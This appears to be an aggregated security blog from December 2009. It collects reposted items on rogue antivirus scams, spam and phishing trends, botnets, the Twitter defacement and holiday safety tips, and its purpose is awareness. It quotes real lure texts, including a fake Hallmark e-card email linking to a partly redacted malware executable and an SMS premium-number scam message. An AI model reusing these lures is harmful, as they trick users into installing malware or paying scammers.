Safe Computing Tips For All

Jerome Segura, a Security Analyst at ParetoLogic of Victoria, B.C., Canada, just posted a nice piece on computer security practices with a different perspective in his “Malware Diaries” Blog.

He begins his list of security tips by considering four classes of users:

1. the pre-baby boomers: These folks rarely touched a computer in their lives and if they did, kudos!
   Typical use: Work, Solitaire, Printing stuff.
2. the early and late baby boomers: They have been interacting with computers pre-Internet and have good notions but lack the ‘modern day stuff’.
   Typical use: Work, e-mail, Online searches.
3. the 70’s – 80’s users: These guys are definitely into computers, maybe a bit more gaming and such. They possess quite a good sense of computing.
   Typical use: Games, Work, E-mail, Online Dating, Forums
4. 90’s to present: Some of them were born with a computer or handheld device. Their lives would not be possible without the MSN, Skype and more recently all the social engineering glitter.
   Typical use: Twittering, Facebooking, Online shopping.

then makes further distinctions by level of security knowledge and awareness:

• extra-cautious (paranoiacs)
•  those who somewhat understand
• those who are over-confident
• security conscious folks.

His “ABCs of online security” is a list of 11 practices that could create a sound security consciousness for everyone, but especially for all those non-technical home users out there.

“- Today’s computers are connected to the Internet and are therefore much more at risk than their ancestors.

“- The Internet is fun but also dangerous.

“- People don’t know what they do and can easily be duped.

“- The more cool stuff, the more risks.

“- The right choice of software and hardware can protect your computer but will not make it 100 percent safe.

“- Updates should be applied religiously.

“- If you aren’t sure about something, check it. Files and Websites can be analyzed prior to opening.

“- Computers are not demons but they can be zombies.

“- Browsing to a site (ANY site) can infect your computer.

“- Backups are your best friends.

“- Virtual Machines are an acceptable way to have an affair (and get infected) behind your computer’s back.” (I think he means “an acceptable way to experiment with potentially malicious sites and files.”)

There’s always been a tendency among the technoroti to look down their noses at non-technical users. Personally I don’t think there has been enough effort put into public education on computer security. It’s way too common to blame the victims and that just doesn’t work. The money they spend for rogue anti-malware products and the cash siphoned out of their bank accounts help fund the criminal groups that prey on all of us.

When it comes to computer security, we’re all in this together.

The U.S. Computer Emergency Readiness Team (US-CERT) has a great page of security documents for all levels of users: http://www.us-cert.gov/cas/tips/

What do you see?

I recently had an interesting message arrive in my system; after viewing the message, 100% of those polled agreed on what it was. What do you think?

What do YOU see?

If you answered spam, you’re on your way to having the mentality of a spam analyst.

This message has many hallmarks of classic unsolicited commercial email:

1. the middle of the message says “Click Here” in big prominent text
2. there’s an “opt-out” banner, announcing that this is an ad
3. the ad contains a “unique ID”
4. despite the (intentionally obscured) address, the message does not say who it is actually from
5. the “call to action” link is http :/fefcbdacggbfg.[redacted].info/alphaville/4754-1b416/ — random sub-domain, published in the .info top level domain, with a directory name comprised of two random words, and a sub-directory that looks like yet another unique identifier.
6. everything in this message except for the “unique ID” under the opt-out banner is actually an image.

Those of you who are actually interested in psychology will also note that the inkblot is not actually part of either the Rorsach or the Holtzman Inkblot Test. It seems to me that this message is more designed to take advantage of those who are willing to try anything to get a job. In the long run, an accredited educational institution will likely be much more beneficial.

AntivirusPC2009

Is this the last rogue for 2009? The cyber criminals will probably ditch 2009 in their naming after the New Year.AntivirusPC2009 may still trick some people before next year though. The fraud tool downloads files on the system and detects them after a scan has been performed.

Not-so funny jokes

Activities associated with Koobface have increased during the month of December. Often it is for the sending of traffic to compromised servers in order to obtain more servers. Other times the activity centers around using those same compromised servers to proxy users to malicious domains that are then used for further distribution of malware or command and control of the infected machines.

SystemCleanerPRO

SystemCleanerPRO is a rogue antivirus program, or a complete scam. SystemCleanerPRO uses fake security alerts and fictitious system pop-ups that warn or infections to frighten users into buying the software. SystemCleanerPRO is a complete rip-off and should be removed form infected PC's immediately.

If SystemCleanerPRO has infected your computer, you may experience the following symptoms:

• Slow sluggish PC
• SystemCleanerPRO running a system scan every time you turn your PC on
• System alerts warning you that the computer is under attack or is not protected, recommending you purchase SystemCleanerPro
• Web browser redirecting to random websites (which are owned by the crooks who author this and other malicious software)
• Other programs not opening or shutting down

if your windows is infected with these kind of malware Click Here to learn how to remove it.

Twitter banned passwords

As you may have heard in the last few days, Twitter has banned 370 passwords (actually only 369, ‘password’ appears twice in the list) as ‘too obvious’ to be safe for their users. A good move in theory but why are so few words banned? And what are they? The list is available in various places online, or even just by viewing the source of the Twitter sign up page. Sadly the sports fans in this Sophos office may be out of luck with both ‘boston’ and ‘redsox’ making the banned list.

Fans of football, basketball or hockey are luckier though, no mention of ‘patriots’, ‘celtics’ or ‘bruins’, all of which are allowed but, quite correctly, flagged as weak.

It’s not clear yet where the folks at Twitter got their list of banned passwords from but it occurred to me that it might be interesting to compare it to another list of common passwords, this time a list that the bad guys are using, the 246 passwords used by Conficker. The lists have only 29 passwords in common with another 100 of the conficker list shorter than Twitter’s 6 character limit. That leaves 117 passwords that malware authors think are common but apparently Twitter does not.

Ideally Twitter would have a better system to discourage users from choosing poor passwords than a simple, and short, blacklist but to their credit they do give passwords a security rating. Their rating system for passwords that they do allow ranks passwords into 4 levels from ‘weak’ through ‘good’ and ’strong’ to ‘very strong’. My advice is to make sure that your password is rated as Very Strong. You’ll need a long password or a combination of upper and lower case letters, numbers and special characters. If you need some help thinking up a very strong password that you can remember, take a look Here.

Facebook and Twitter Security - And How to Stay Safe!

Hopefully, the holiday season has found you spending a good amount of time offline: enjoying moments spent with friends and family, keeping long-standing traditions or creating new ones to follow for seasons to come, or just relaxing due to some downtime from work or school.

It wouldn’t come as much of a surprise, though, if you’ve still found yourself spending a fair share of your time during the holidays online: checking status updates and posting new pictures on Facebook, or sending and checking tweets on Twitter. And, why not? These networking sites are an easy way to connect and share with the people we care about.

But, there is a downside: popular networking sites continually take heat for privacy concerns, and are also crawling with criminal behavior. CNET News, in a recent article it ran on security issues on Facebook and Twitter, cites two industry reports that illustrate this:

• Per a recent Sophos study, Facebook users are quick to reveal sensitive private information to people they don’t know, with 40% of Facebook users ‘blindly accepting’ friend requests from strangers and allowing access to personal information, like their date of birth, physical address, e-mail address, and phone number.
• According to Kaspersky, of the nearly 500,000 new URLs that are tweeted daily on Twitter, between 100 and 1,000 are malware attacks.

The CNET News article, “Using Facebook and Twitter Safely”, goes on to give a thorough roundup of some of the most common security and privacy issues users are faced with. It not only takes you through what the specific threats are, but more importantly, it explains what you can do about them. Take a look at the full article to learn more about solutions you can put to use today to stay safe.

And, I hope that you’re enjoying the holidays, and that you're staying safe and secure - both online and offline!

Antispyware Shield Pro

Antispyware Shield Pro is a phony security software, also known as a rogue. Antispyware Shield Pro uses fake security warnings and pop-up alerts to frighten people into thinking their PC is infected. Antispyware Shield Pro will not remove these supposed infections until you purchase the software. Do not fall for this scam, Antispyware Shield Pro is an infection itself.

if your windows is infected with these kind of malware Click Here to learn how to remove it.

Total PC Defender

Total PC Defender is a rogue security software, a complete scam designed to rip people off. If Total PC Defender has infected your PC, you should remove it immediately.

if your windows is infected with these kind of malware Click Here to learn how to remove it.

Researchers take down Mega-D, one of top 10 botnets

Atif Mushtaq, a researcher at FireEye security company, has coordinated a global effort to take down of one of the top 10 botnets – Mega-D.

PC world said the botnet controlled 250,000 machines in a massive network that was responsible for nearly 12 percent of world spam according to Message Labs statistics.

Mushtaq and those working with him coordinated their efforts with Internet service providers to isolate the Mega-D command-and-control servers in Israel, Turkey and the U.S.

The researchers shared their information with U.S. federal law-enforcement agencies and said the federal agencies should begin similar research and takedowns on a full-time basis.

Story here.

“Top 10 botnets and their impact” (December 9)

A Christmas greeting from Koobface

Security researchers examining the directories of the URLs of some of the latest Koobface runs may stumble upon a Christmas greeting:

Are you caring for your Mom and Dad at Xmas?

For those of you that are having to put up with looking after your parents over Christmas: Would you much rather selfishly indulge yourselves with partying? A kindly spammer has a very seasonal Christmas Eve message offering to make this the last year that you will have to “put up” with the burdens of family elders.

But be careful that your own children don’t read this.

Free Help Finding Senior Care for Mom or Dad

Do you have an aging parent or loved one? Do you sometimes worry about their living situation? Finding the right elder care option for your loved one can be an overwhelming and difficult process.

Fortunately, there is a simple way to find an elder care solution for your loved one! A is a FREE elder care referral service assisting families in finding resources of every kind.

We can quickly help you find the following options:

• Assisted Living Communities 
• Nursing Homes
• Retirement Communities
• Alzheimer’s Care Communities
• Residential Care Homes
• Home Care Services
• Other Elder Care Services

Beginning your search with is easy - click here to get started now!

Warm regards,

Technically this may be a legitimate emailing within the U.S.A. under the CanSpam legisation. But it certainly does not seem to be quite in the spirit of Christmas.

APCProtect

APCProtect is a phony security program, designed to rip people off. APCProtect uses scare tactics including false security warnings and system scan results that are false to frighten people into purchasing it. If APCProtect is installed on your computer, you should remove it immediately.

if your computer is infected with this malware, you must remove it soon, Click Here to learn how to remove it.

Merry CHRISTMA EXEC

Once again, we'd like to wish our readers Merry Christmas with a reference to the 1986 CHRISTMA EXEC worm

Here's a link to January 1987 Risks Digest, discussing the worm.

And here's a link to the original source code for this worm. Normally we wouldn't link to malware code, but hey, it's 23 years old.

AV-Comparatives Summary Reports 2009 Available!

AV-Comparatives Summary Reports 2009 Available!
Summary Report 2009

AV-Comparatives Site: http://www.av-comparatives.org/
Read/Download Summary Here.

Overall winners of 2009 (Best Products of the Year by AV-Comparatives):


To be rated “Best Anti-Virus Product of 2009” by AV-Comparatives, an Anti-Virus product should preferably have very high detection rates (of malware and also potentially unwanted applications), high proactive on-demand detection (or provide proactive protection), very few false positives (FP), scan fast and reliably with a low system impact, provide good malware removal capabilities, protect the system against malware/websites with malicious software without relying too much on user decisions/interactions, cause no crashes or hangs, and have no annoying bugs.
Based on the awards given by AV-Comparatives during 2009, several products got many high awards and are very close, so that we decided to award not only the Best Product of 2009 but also the second and third places (Silver and Bronze). Looking into the detail of the raw results, we decided to give the following awards:

1. GOLD: Symantec (Best Product of 2009) 
2. SILVER: Kaspersky 
3. BRONZE: ESET

All about Brittany on Twitter

It's the usual situation, with the bad guys exploiting the death of a famous person, just like they did with Michael Jackson.

Yesterday we identified some Twitter accounts that are being used both to send "make money on the Internet" spam, and also to spread links to malware. In both cases, they used Brittany Murphy's name.

Here's a couple of examples:

Latest AV-Comparatives test Available (Performance comparative)

Performance comparative test result is available!

AV-Comparatives: http://www.av-comparatives.org/
Read/Download test result from Here.

NRA: Beware the '12 scams of Christmas'

This is the '12 scams of Christmas' I mentioned in last post:

Pipers tout fake gold rings as Maids are 'a-phishing' to milk bank accounts

On what is traditionally the busiest online shopping day of the year (1), consumers are being warned not to become victims of the '12 Scams of Christmas' and to take extra care with personal and IT security.

The '12 Scams of Christmas' developed by the National Fraud Authority (NFA), The UK Cards Association and the City of London Police (CoLP) highlight the greatest holiday fraud threats and how to spot them.

1. Shopping and online auction fraud (counterfeit goods and websites)
2. Credit and debit card fraud (including cash machine fraud)
3. Scam ticket websites
4. Lottery, prize draw and sweepstake scams
5. Identity fraud and theft
6. Phishing emails
7. Scam letters (usually from West Africa or Eastern Europe)
8. Loan scams
9. Premium phone line scams
10. High value item scams (shares, gemstones and fine wine)
11. Rogue doorstep sellers
12. Slimming and miracle cures.

With just 18 shopping days left and new research suggesting over 90% of people plan to purchase Christmas gifts online this year (1) opportunistic fraudsters are busy 'phishing' for their next victims. However, the threat is not only on the web, the high streets are also a 'fraudster's paradise'.

Criminals take advantage of those distracted by Christmas festivities: ATM users and revellers hitting bars and pubs are prime targets for 'shoulder surfers' and 'card cloners'. Those undertaking last minute home repairs fall foul of bogus traders, while people purchasing tickets for special events or dieting during the holidays, are also on the 'fraudster's Christmas shopping list'.

The National Fraud Authority (NFA), the Government's strategic lead organisation on counter-fraud activity, is working to increase fraud awareness during this holiday period and has published '12 simple tips' to help combat fraud this Christmas.

CEO of the NFA Dr Bernard Herdan said: "One of the greatest barriers we have in educating people about fraud is the stigma associated with it. Fraud is not a victimless crime. In some cases it destroys lives. Listen to the warnings. Be aware. Once you are defrauded, your personal details can end up on a 'suckers list'. They can then be traded on the internet. So it may not be a Happy New Year for you!

"Some simple ground rules are to always consider your card details as cash. In the hands of criminals it makes no difference, and remember, if it sounds too good to be true, it probably is."

Attorney General, Baroness Scotland QC, who oversees the NFA said: "Fraudsters don't take Christmas off. They use the holidays to develop new ways to steal. Counter-fraud agencies have issued this warning to protect us all, and it's important we act on their simple, straightforward advice. If people don't, they could well pay the price. Give yourself a present - be safe this Christmas."

The UK Cards Association has recently launched its 2009 'Be Card Smart Online' campaign website to help consumers minimise their chances of being a victim of card fraud online.

Head of Fraud Control at The UK Cards Association Katy Worobec said: "More than 32 million of us now shop online, and we all need to work together in the fight against fraud. Consumers can play their part by regularly updating their computer's anti-virus systems, looking for the padlock on sites when online and registering with card protection initiatives such as Verified by Visa and MasterCard SecureCode. Top tips can be found in our Don't Reward Fraud booklet at www.financialfraudaction.org.uk."

City of London Police, the Lead Force on Fraud, is taking the opportunity to remind people to protect their PIN number when using ATMs or when paying by credit or debit card in restaurants, bars and clubs over Christmas. Its warning comes as part of an ongoing operation to combat 'shoulder surfers' who note personal identity numbers (PINs), steal wallets and hand bags and then empty bank accounts before the victim realises.

Detective Superintendent from the City of London Police, Bob Wishart, said: "Criminals involved in this 'shoulder surfing' target busy bars where it is easier to operate undetected.

"We are making arrests to stop those involved. However, we know this problem is widespread and that thieves will be looking to take advantage of the Christmas season, as the bars and clubs get busier.

"People should take simple measures: make sure you always cover your PIN number, and keep your wallet or purse safe. I can assure you that criminals are patient. They will wait for the opportune time to steal your wallet or handbag. It only takes a second."

(1) IMRG tracks online sales using the Capgemini index. It surveyed 2,804 people about shopping habits in the run up to Christmas 2009 (e-Customer Service Index).

The 12 scams of Christmas

Tanya has just posted over on Kaspersky Russian site about losses caused by Internet fraudsters in England and Wales. If you want to practice your Russian, hop over there, and take a look!

I know that most people in the UK prefer to get their news in English. So here's a few facts and figures:

In a recent statement, the Office of Fair Trading estimated that losses caused by Internet fraud amounted to £14 billion per year. That's a lot of money! It's also a lot of victims!

The OFT statement quotes research carried out by the University of Portsmouth, commissioned by ACPO (Association of Chief Police Officers) and NRA (National Fraud Authority):

• 70,000 people fell victim to a single Nigerian e-mail scam 
• 38,000 people a year fall victim to fake prize draws 
• 10,000 people a year fall victim to investments scams
• 14,000 people a year fall victim to fake lotteries

The report indicates that many people are reluctant to report fraud of this kind - because they're ashamed, embarrassed, angry or simply confused.

The first thing to remember is that you should be very, very wary of 'get-rich-quick' schemes: if something looks too good to be true, it almost certainly is! Please don't hand over money to complete strangers and avoid disclosing any personal information unless you know eactly who you're dealing with. The NRA gives a helpful list of the '12 scams of Christmas' so if you're in any doubt, check this list out.

If you do fall victim to an Internet scam, please do report it - you can do that here. Nobody's going to judge you - on the contrary, the more reports are made, the better we can quantify the threat! Remember, we can't begin to really manage the problem of Internet fraud and cybercrime unless we can measure it effectively.

Crime time

Crime traditionally increases during the holiday season, and cybercrime is no different. The malware writers, spammers and scammers are out in force. They've recently hit "Odnoklassniki" with this message:

"Hi! I've got a New year surprise for you [emoticon] send 2133 279 (must be with a space) to 4460 and you'll be pleasantly surprised! If you don't take a look, I'll be very grouchy with you [emoticon]"

This message is clearly designed to make the bad guys a bit of holiday cash: an SMS sent to the number given in the message costs between $5 and $12 dollars, depending on the mobile service provider.

With similar messages going out on other social networks like VKontakte, Facebook and MySpace, the scammers could do nicely out of this one. And because the messages might come from friends or contacts who've had their accounts hijacked, it's easy to be fooled.

Enjoy the holidays, enjoy spending time with your family and friends, and enjoy the Internet – just be careful and keep safe!

US Chief of CyberSecurity

After months of negotiations, US President Barack Obama has finally chosen a Chief of CyberSecurity - Mr Howard A Schmidt. Confirmation of the appointment is expected shortly.

Mr Schmidt, who previously served with the Bush administration as a cyber security official, comes to the job with an impressively lengthy list of credentials.

The new Chief will essentially be the administration's go-to man for any coordinated efforts to deal with cyber threats and will be reporting to the National Security Council.

After a fairly eventful year of cyber attacks and the related media frenzy, it's nice to see someone finally willing to take up the challenge of dealing with it all. It also promises an interesting 2010.

Best of luck to the new Cyber Czar.

More details in The New York Time's article.

Facebook: money mule or credit card

I was just looking at Facebook to check for spam and scams when I found this:

I've blurred out a few things for privacy, and, most crucially, safety. The point of this post is the domain name. The spaces around the dot and the zero in "C0M" are just as they were in the original spam message. If spammers are going to the trouble to obfuscate their messages, it seems to show that Facebook's spam filters are having some effect. Malformed links mean that you have to make an serious effort to actually go and visit the spammer site. And consequently, if someone's going to go through all that trouble, they're more likely to buy into whatever scam is at the other end.

Check Your Friends! Facebook IMs May Lead To Trouble

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

Brittany Murphy SEO

Just a quick note - the sudden death of Hollywood celebrity Brittany Murphy last Sunday (BBC report here) has prompted a spike in searches on the subject - and of course, an SEO attack.

Users who click on a poisoned search result link will be redirected to a website that will display a scare message trying to panic users into downloading rogue AV software:

Screenshots of the rogue AV:

Absolutely bog standard SEO attack - but still worth a warning to those who might be looking for more news on the event.

Christmas Bo(g)us

Well, it didn’t take long for the Christmas E-Card scams to start.

Recently we have seen email messages pretending to be from Hallmark, suggesting that you have received an E-card from a friend. The complete email message looks like this:You have recieved a Hallmark E-Card from your friend.
To see it, check the link below:
http://www.hallmark.com/webapp/wcs/stores/Occasion/ChristmasE-CardsThere’s something special about that E-Card feeling. We invite you to make a friend’s day and send one.Hope to see you soon, Your friends at Hallmark

Note, that the link looks like it’s from Hallmark, but it’s fake. If you hover your mouse over the link and look at your browser’s status bar, the real link show up (which in this case is http://www..com/_themes/Christmas.exe). This piece of malware is detected by us as Troj/VBInject-S.

Just something else to look out for during the silly season.

ProtectPCs

ProtectPC's is a nasty rogue antivirus program, or phony security software, used to scam people out of their money. If your PC is infected with ProtectPC's you should remove it immediately.

ProtecPC's poses a serious security risk for all PC users. Symptoms of a ProtecPC infection can include:

• Web Browser redirecting spontaneously
• System scans that result in reports showing multiple infections
• Pop-Ups and system alerts stating the PC is infected
• Programs being shut down or unable to open

Click Here to learn how to remove these kind of malware.

Malware Defense

Malware Defense is a rogue security program, designed to look like legitimate security software. If Malware Defense has been installed on your PC more than likely you did not intentionally download it, it just appeared one day.

Malware Defense usually infects a computer system with help from malicious advertising or a trojan found on a shady website. Malware Defense usually infects unsuspecting users PC's without permission. Malware Defense is a scam, do not buy this software, it should be removed from infected computers immediately.

Click Here to learn how to remove these kind of malware.

Last minute shopping - keep safe!

The holidays are nearly here! If you're still searching for the final perfect present, and are thinking of buying online, here's a few practical tips to help keep your last-minute purchases secure:

1. Keep your Internet Security solution updated, not just to the day but to the hour! They release frequent updates to make sure you're protected from the very newest malware. Scan your system before you start shopping.

2. Don’t shop from public WiFi networks which aren't secured using WPA2. These networks can be easily hijacked by cybercriminals, and your sensitive financial data could be compromised.

3. Make sure your system is up-to-date! You should make it a habit to download and install updates not just for your operating system but also for third party applications like:

• Browsers like IE, Firefox, Opera, Safari, Google Chrome or any other you use
• Adobe system applications. 
• Media players like Realpayer, Winamp, etc.

You may use Secunia to scan your computer for dangerous programs.

4. Check that the sites you shop on are secure! A secure online shopping site will have a valid digital certificate which is used to encryption and secure your online transaction and it will have an icon showing a closed padlock in the bottom or the top of your browser.

The address bar should have an ‘https’ string before the page address.

Remember - NEVER shop on a page which doesn’t have ‘https’ in the address bar:

or if the padlock is open or broken, or if you get a warning regarding the digital certificate of the page you’re on!

Wishing you safe online shopping and happy holidays!

System Adware Scanner 2010

System Adware Scanner 2010 is phony security software, made to look and act like legitimate security software. System Adware Scanner 2010 is a potentially very dangerous PC infection that should be removed from infected systems immediately.

System Adware Scanner 2010 usually uses false security warnings and alerts to frighten people into buying the software. System Adware Scan 2010 will run system scans and report numerous infections to the user, which are false. System Adware Scanner 2010 will then request payment to remove the supposed infections.

If your PC is infected with System Adware Scan 2010, you must remove it very soon, Click Here to learn how to get rid of it.

There's No Such Thing as a Free Movie

Those looking to see the latest 3D blockbuster movie, The Avatar, on the cheap will have to take great care in what they search for. We have become aware of at least one site that has been rigged to redirect users to a page that presents the now-familiar "play video/need codec" screen. In an unusual twist, this time it is offering a new ActiveX update rather than the usual codec or Flash player updates.

Data Doctor 2010 will make you sick

Data Doctor 2010, an encryption trojan via our old "friends" iframedollars. It encrypts the files on your hard drive very rapidly if you’re unfortunate enough to be victimized by it.

It arrives through drive by downloads from malicious web sites. It’s also packaged with other malware.

1. The victim receives a message that the system is shutting down due to "Unrecognized disk driver command."

The most phished brands of 2009

Almost the entire year 2009, the battle for the first place on phishing targets took place between Ebay and Chase Bank. Most of the time, the Chase Bank was on top of the most phished brands.

In December, the situation was changed: Now PayPal is the most phished brand (32205 unique URLs) followed from far away by the Chase Bank (25901 unique URLs) and Ebay (18738 unique URLs).

Why this change? Most probably it has to do with the fact that a lot of people are using PayPal to pay for Christmas presents.

Be safe during the winter holidays and always write the address of PayPal and other online banks in the browser by yourself and never click on links in emails.

CNNIC changes have effect on spam tactics

As was announced on Dec 11th, CNNIC (China Internet Network Information Center) now requires a “formal paper based application material when making the online application to the registrar.”

The motivation behind this seems more related to cracking down on porn sites, but since .cn domains have been the call-to-action in 35-50% of all spam being sent for well over a year, we were wondering what effect this policy change may have on the prevalence of this TLD in spam. The graph below illustrates the percentage of spam messages sent each day that contain a .cn domain (vast majority are Canadian Pharmacy type spam) as well as the percentage of pharmacy spam messages sent that contain a link to a free webhosting service (blue). I decided to measure the .cn abuse, against free webhosting abuse, as the same Canadian Pharmacy spam that contained links to .cn domains for the past few months, now contain links to a number of free webhosting services instead. The CNNIC changes started to be applied on December 14th.

Three specific free webhosting services seem to currently be the favorite of these specific Canadian Pharmacy spammers, and their growth is illustrated below.

These spammers have not completely moved away from .cn abuse, as this morning we starting seeing an influx of .cn domains not previously sighted in spam before, however all these domains were actually registered well before these new CNNIC requirements were implemented (most registered for 2 years, back in 2008). For example:

example .cn whois

It will be interesting to monitor if these new CNNIC requirements continue to push these spammers elsewhere, or if this is just a minor hiccup while they find ways around the new registration hoops.

Microsoft privacy portal a target of rogue security software

Earlier in 2009, the Microsoft privacy homepage became the target of rogue security software developers looking to make a fast buck. The developers of the rogue security application known as “Privacy Center” even went so far as to include a link to Microsoft to trick users into thinking the rogue is a Microsoft product. Trojan:Win32/PrivacyCenter is a family of programs that claims to scan for malware and displays fake warnings of “malicious programs and viruses”. They then inform the user that they need to pay money to register the software in order to remove these non-existent threats.

We have received reports that this trojan has been distributed via poisoned search results, where users are redirected to sites that display fake scanners. These pages mistakenly report that the user's system is infected in order to convince users to download Trojan:Win32/PrivacyCenter. We have also received reports that this trojan has been distributed masquerading as a fake video codec. The pages and files utilized in this form of attack are highly variable, and change according to the user's location, browser and operating system. Below is a screenshot of the rogue program:

Reports of rogue security programs have been more prevalent as of late. These are programs that generate misleading alerts and false detections in order to convince users to purchase illegitimate security software. Some of these programs may display product names or logos in an apparent and unlawful attempt to impersonate Microsoft products.

To find out how to remove it, Click Here.

now there are many more ways to keep reading my blog and receiving updates from me!

you may follow me on Twitter:

Subscribe for my RSS:

↑ Grab this Headline Animator

Or receive my posts updates in your E-Mail Inbox:

Subscribe to Omid's Blog! by Email

Twitter Defaced by Iranian Hacktivists

Twitter, one of the Internets most popular social networking sites, has been hacked and defaced by a group claiming to be an “Iranian Cyber Army” as of 10:15PM PST today. At this point no statement has been made by Twitter, so it’s unclear as to what vulnerability was used to exploit the site. Oftentimes hacktivism campaigns are fueled by ego-driven script kiddies who use publicly available exploits, but for now we’ll have to wait and see if Twitter decides to publicly announce the details surrounding the attack.

The defacement has been removed and Twitter is back up and running as of 11:20 PM PST.

Twitter states that the problem was due to compromised DNS. Full investigation pending.

Note: Change your password!

Visiting Twitter.com at 10:15 PM PST tonight rendered the following images and text:

IRANIAN CYBER ARMY

THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY

U.S.A Think They Controlling And managing Internet By Their Access, But They Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To. NOW WHICH COUNTRY IN EMBARGO LIST? IRAN?USA? WE PUSH THEM IN EMBARGO LIST ;) Take care.

Updates:

• Story here. 
• Twitter blog.
• a good link to follow updates about this story Here.

FBI: Fraudsters earned $150 million in rogue AV scams

For the first time, the FBI has issued a public warning about the threat of rogue anti-virus software, which the agency said has resulted in more than $150 million in losses to victims.

In an intelligence note posted Friday on the website of the Internet Crime Complaint Center, the FBI said users should be on the lookout for pop-up advertisements masking as legitimate-looking AV software, known as "rogueware" or "scareware."

Rogue anti-virus software typically is purveyed through malicious advertisements, or "malvertisements," on trusted websites. When viewed or clicked, the ads lead users to sites that claim their computer is infected and, to resolve the issue, they should buy an anti-virus product, which turns out to be fake. In other instances, the ads try to install trojans onto the victim's PC.

Criminals also have orchestrated the attack by "poisoning" search results, so that when a user searches for a popular term, he or she is led to a website site hosting the bogus software.

"The scareware is intimidating to most users and extremely aggressive in its attempt to lure the user into purchasing the rogue software that will allegedly remove the viruses from their computer," the FBI alert said. "Once the pop-up appears, it cannot be easily closed."

The FBI said computers running with administrator privileges are more likely to be infected. In addition, users should always research the names of security software applications to ensure their legitimacy.

A recently released report from the Anti-Phishing Working Group, which analyzed internet fraud trends for the first half of 2009, found that the number of rogue AV programs from January to June surpassed the total for all of 2008. In June, the final month of the study, there were 152,197 new strains.

"The primary reason for the creation of so many variants is to avoid signature-based detection by legitimate anti-virus programs," said Luis Corrons, technical director at PandaLabs and a contributor to the report. "The use of behavioral analysis is of limited use in this type of malware because the programs themselves do not act maliciously on computers, other than displaying false information."

WiniGuard clones are coming thick and fast

Another Clone of WiniGuard family, SysDefence! went live about 3 hours ago. They're flying off the conveyor belt today.

The GUI is identical to TheDefend except the name.

Spam for the visually impaired

Starting at ~3:20pm GMT today, Canadian Pharmacy spammers began using attached MP3 files as the call-to-action for their latest campaign. The message had no subject, no “text” body content, just an attached “audio/mpeg” file with a random lower case file name.

Upon playing the attached mp3 file, you find out why I called it the “call-to-action”. A robotic sounding woman’s voice reads off the URL they would like recipients to browse to (letter by letter), with porn-like moaning as background noise. I guess they are going for the often used spam tactic of tying ED pills (Viagra, Cialis, etc..) to porn star-like performance in bed.

Here is a re-encoded sample:

Canadian Pharmacy Waveform
Previous runs from these spammers took the more typical “Image spam” form (an attached JPEG). Example:

Canadian Pharmacy JPEG example

I am aware of at least one other spam run using attached MP3s, but you would have to go all the way back to 2007: Stock spammers pump up the volume with MP3 files

Yet another example of how willing spammers are to try anything to hide the content of their campaigns from filters. However in this case, I would suspect this technique won’t last for long as the likelihood of recipients opening some blank message with just an attachment, from an unknown sender, is quite low. That said, remembering back to the “Summer of PDF spam” (June/July/August of 2007 where 10-40% of all spam had attached PDFs) suggests they may not care if very few recipients open their spam.

Who’s the quickest? Only one way to find out…

Earlier on this morning I happened to notice a redirect page used in a meds spam campaign that just happened to also be compromised with a malicious script.

You can see the META tag redirect that will instruct the browser to immediately load the page on the target site.
And immediately below, it, the obfuscated JavaScript injected into the page. Deobfuscating this script, we can see its payload is also redirection, this time to a malware site.

Curiosity got the better of me. Which payload ‘wins’ when the browser loads the page? The META redirect or the JavaScript? Only one way to find out…

Ok, not quite Harry Hill, but I loaded the page with Internet Explorer on a test machine to find out. It appears that the malicious script has precedence over the META redirect, and the iframe payload was delivered. Unfortunately, not a happy ending - infection with rogue security software.

Definitely one scenario where you would have been better off with our Canadian Health friends at the end of the META redirect.

Do you want Bing for iPhone? There's an app for that

Earlier this evening, Microsoft formally announced a new search app for iPhone on the Bing Community blog. The Bing app is available now from the App Store, complete with voice search. I emphasize the now because the app has a December 16 release date on the 15th.

Based on a very quick, cursory look, Bing is a competent iPhone app, tapping into the kind of capabilities expected from the platform. Bing fits nicely into the App Store repertoire. I wouldn't call the features revolutionary -- Apple and Google are there already with advanced mapping and GPS -- but the packaging appeals, and Microsoft manages to offer a user experience that is fairly consistent with Bing Web search.

"Our investments in voice search (you may have played with them on Windows phones or BlackBerry already) continues in our iPhone App and works great for map locations as well as old fashioned web search," according to the Microsoft blog post announcing Bing for iPhone." Just say 'San Francisco weather,' for a quick result, or even say a full address for a map or directions. Try something complex, like '1 Microsoft Way, Redmond 98052.' (Yes, I know how to get to work.) Hold the phone to your ear and speak, or press the mic button -- simple."

Google's iPhone search app also supports voice search, which is prominently available on Android phones. Voice search is a great utility and demonstrates how natural user interfaces can greatly improve the smartphone data experience compared to PCs. I would -- again, from a quick look -- pick Bing voice search over Google on iPhone, but find Google's voice search in Android to be more appealing.

Microsoft also touts location search tied to mapping and GPS: "Speaking of directions (ha), looking for a coffee shop nearby? Bing automatically finds your location. It's also easy to discover a new spot by category such as restaurants, banks, theaters and choose whether you want walking or driving directions."

Location-awareness isn't exactly new to iPhone, but at least Microsoft offers an alternative to the Google Maps functionality built into the device. The mapping feature looks promising, but will require more testing for proper evaluation. The visuals impress, at least. Still, regardless of merits, Bing mapping features are Google catchups.

The Bing home screen is nicely laid out, and it comes with the expected background image typically found on the Website search page. Categories like businesses, directions, movies or maps help simplify search. Clearly there is emphasis on local search, which absolutely is the right priority. I love the photo search, by the way. Presentation is simply awesome.

Many pundits will quip about how Microsoft is conceding something by releasing an iPhone app and not keeping Bing solely for Windows Mobile. Microsoft already offers a Bing search app for other mobile platforms, and even more supported platforms is the right strategy. Search is the future of mobile phones -- and any advertising packaged along with it. Microsoft had better be there or be square. Bing search should be available for all mobile platforms. Bing for iPhone is smart business. The concession would be keeping Bing only for Windows Mobile.

Early end user App Store reviews are positive (I won't guess how many are Microsoft employees). Commenter Xuedonghuang writes: "It's a great Christmas gift from Microsoft."

Merry Christmas, Idiot

It's not a huge surprise that we are seeing some malware spam runs where the malicious attachment attempts to portray itself as a Christmas Greeting of some sort.

Here's an example from today (md5: C670165AE6DFA8318F0EA795B1D3AD55). This one is actually a Zapchast (IRC bot variant).

The "Christmas Card" requires it's own "special version" of Flash to be installed — flashplayer2009.exe — which is the malware itself.

Once ready, it will display this friendly message written in Universal Gibberish.

Pay attention to the cheerful filename used for this message — idiot.jpg.

